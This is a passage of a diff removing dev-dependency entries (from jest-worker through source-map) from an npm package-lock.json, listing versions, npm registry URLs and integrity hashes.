"integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.7.0", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "jose": { - "version": "4.15.5", - "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.5.tgz", - "integrity": "sha512-jc7BFxgKPKi94uOvEmzlSWFFe2+vASyXaKUpdQKatWAESU2MWjDfFf0fdfc83CDKcA5QecabZeNLyfhe3yKNkg==", - "dev": true, - "optional": true - }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - }, - "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=", - "dev": true - }, - "jsesc": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.0.2.tgz", - "integrity": "sha512-xKqzzWXDttJuOcawBt4KnKHHIf5oQ/Cxax+0PWFG+DFDgHNAdi+TXECADI+RYiFUMmx8792xsMbbgXj4CwnP4g==", - "dev": true - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==", - "dev": true - }, - "json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==", - "dev": true - }, - "json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=", - "dev": true - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "jsonpath-plus": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-7.2.0.tgz", - "integrity": "sha512-zBfiUPM5nD0YZSBT/o/fbCUlCcepMIdP0CJZxM1+KgA4f2T206f6VAg9e7mX35+KlMaIc5qXW34f3BnwJ3w+RA==", - "dev": true - }, - "jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "dev": true, - "requires": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - } - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", - "dev": true - }, - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "optional": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "make-dir": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", - "integrity": "sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", - "dev": true, - "requires": { - "semver": "^7.5.3" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", - "dev": true - }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "requires": { - "tmpl": "1.0.5" - } - }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "requires": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - } - }, - "mime-db": { - "version": "1.49.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", - "integrity": "sha512-CIc8j9URtOVApSFCQIF+VBkX1RwXp/oMMOrqdyXSBXq5RWNEsRfyj1kiRnQgmNXmHxPoFIxOroKA3zcU9P+nAA==", - "dev": true - }, - "mime-types": { - "version": "2.1.32", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.32.tgz", - "integrity": "sha512-hJGaVS4G4c9TSMYh2n6SQAGrC4RnfU+daP8G7cSCmaqNjiOoUY0VHCMS42pxnQmVF1GWwFhbHWn3RIxCqTmZ9A==", - "dev": true, - "requires": { - "mime-db": "1.49.0" - } - }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true - }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "minipass": { - "version": "3.1.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.1.6.tgz", - "integrity": "sha512-rty5kpw9/z8SX9dmxblFA6edItUmwJgMeYDZRrwlIVN27i8gysGbznJwUggw2V/FVqFSDdWy040ZPS811DYAqQ==", - "dev": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "minizlib": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", - "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", - "dev": true, - "requires": { - "minipass": "^3.0.0", - "yallist": "^4.0.0" - } - }, - "mkdirp": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", - "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", - "dev": true - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.18", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.18.tgz", - "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true - }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "requires": { - "path-key": "^3.0.0" - } - }, - "oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "dev": true - }, - "object-hash": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-2.2.0.tgz", - "integrity": "sha512-gScRMn0bS5fH+IuwyIFgnh9zBdo4DV+6GhygmWM9HyNJSgS0hScp1f5vjtm7oIIOiT9trXrShAkLFSc2IqKNgw==", - "dev": true, - "optional": true - }, - "oidc-token-hash": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/oidc-token-hash/-/oidc-token-hash-5.0.1.tgz", - "integrity": "sha512-EvoOtz6FIEBzE+9q253HsLCVRiK/0doEJ2HCvvqMQb3dHZrP3WlJKYtJ55CRTw4jmYomzH4wkPuCj/I3ZvpKxQ==", - "dev": true, - "optional": true - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=", - "dev": true, - "requires": { - "wrappy": "1" - } - }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "requires": { - "mimic-fn": "^2.1.0" - } - }, - "openid-client": { - "version": "5.4.0", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-5.4.0.tgz", - "integrity": "sha512-hgJa2aQKcM2hn3eyVtN12tEA45ECjTJPXCgUh5YzTzy9qwapCvmDTVPWOcWVL0d34zeQoQ/hbG9lJhl3AYxJlQ==", - "dev": true, - "optional": true, - "requires": { - "jose": "^4.10.0", - "lru-cache": "^6.0.0", - "object-hash": "^2.0.1", - "oidc-token-hash": "^5.0.1" - } - }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "requires": { - "p-limit": "^2.2.0" - }, - "dependencies": { - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - } - } - }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true - }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - } - }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true - }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha1-F0uSaHNVNP+8es5r9TpanhtcX18=", - "dev": true - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true - }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=", - "dev": true - }, - "picocolors": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", - "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", - "dev": true - }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true - }, - "pirates": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.5.tgz", - "integrity": "sha512-8V9+HQPupnaXMA23c5hvl69zXvTwTzyAYasnkb0Tts4XvO4CliqONMOnvlq26rkhLC3nWDFBJf73LU1e1VZLaQ==", - "dev": true - }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "requires": { - "find-up": "^4.0.0" - } - }, - "prettier": { - "version": "3.4.2", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.4.2.tgz", - "integrity": "sha512-e9MewbtFo+Fevyuxn/4rrcDAaq0IYxPGLvObpQjiZBMAzB9IGmzlnG9RZy3FFas+eBMu2vA0CszMeduow5dIuQ==", - "dev": true - }, - "pretty-format": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", - "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.3", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } - } - }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - } - }, - "psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==", - "dev": true - }, - "punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==", - "dev": true - }, - "pure-rand": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", - "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", - "dev": true - }, - "qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", - "dev": true - }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "dev": true, - "requires": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dev": true, - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - } - } - }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true - }, - "resolve": { - "version": "1.22.8", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", - "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", - "dev": true, - "requires": { - "is-core-module": "^2.13.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - } - }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "requires": { - "resolve-from": "^5.0.0" - } - }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - }, - "resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true - }, - "rfc4648": { - "version": "1.5.1", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.1.tgz", - "integrity": "sha512-60e/YWs2/D3MV1ErdjhJHcmlgnyLUiG4X/14dgsfm9/zmCWLN16xI6YqJYSCd/OANM7bUNzJqPY5B8/02S9Ibw==", - "dev": true - }, - "safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==", - "dev": true - }, - "safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==", - "dev": true - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "requires": { - "shebang-regex": "^3.0.0" - } - }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true - }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true - }, - "source-map": { - "version": "0.6.1", - 